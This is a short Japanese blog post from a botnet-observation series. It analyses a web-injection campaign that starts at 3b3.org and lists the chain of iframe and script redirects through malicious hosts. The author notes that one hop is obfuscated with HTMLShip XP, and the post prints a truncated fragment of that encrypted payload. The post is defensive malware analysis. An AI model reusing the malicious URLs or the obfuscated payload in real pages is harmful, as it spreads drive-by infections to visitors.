cNotes 検索 一覧 カテゴリ

3b3.orgの続き HTMLShipでエンコード

Published: 2009/02/25

なんとなくツールを試そうとしてみただけなんですが、このインジェクションURLの飛び先が変わっているのをみつけてしまいました。

 [wide]http://3b3.org/*.js
    [frame]http://70.38.99.97/*.htm
        [frame]http://w.4edg.cn/01/*.htm
            [frame]http://w.4edg.cn/01/*.htm
            [script]http://js.tongji.cn.yahoo.com/948369/*.js
                [script]http://js.tongji.cn.yahoo.com/948369/\""+_st_dest+"\"
    [script]http://js.tongji.cn.yahoo.com/908507/*.js

快調だったのに、くっ、4番目のジャンプ先がデコードできない。

「The page is protected by HTMLShip XP(Unregistered Version)」ですか、、、

Webpage encryptorですか、、、

うーんこんなものつかわれたら解析が難しくなりますね。いろんなwebpage encryptorが使われてるっていう話は聞いていましたがはじめて?みつけました。やっぱりねちねち解析するよりfirefoxなりに食わせてしまう方が手っ取り早いか、、、でもこのツールを使った目的は、最初のURLからiframeやscriptで次々にジャンプしていくリダイレクトの状況、何番目のジャンプ先かを簡単にすべて記録できることだったので、その目的は満たせないんですが、、、

 <html><head><Meta Name=Encoder Content=HTMLSHIP>
 <!--The page is protected by HTMLShip XP(Unregistered Version)--><META HTTP- 
 EQUIV="imagetoolbar"  CONTENT="no"><noscript><iframe></iframe></noscript>
 <script  language="javascript"><!--lX11="\'\^F\<\.dd\.\.",sI71="\'\^idiFO\<\<";0.5142906,pR39="0.3402269",
 sI71='\rwXV\,\@\)Lay\/9FGjhdt3\~mS\;\[6\_\.M\=K8U\%\!7pYsfC\+\&W\{\]ecuT02H\#nNqPZrAgikO\|zv\\l\<R\$\:\(\*\^\n1Jb\?I\'\"xB\`\ \-\}

[カテゴリ:botnet観察日記]

by jyake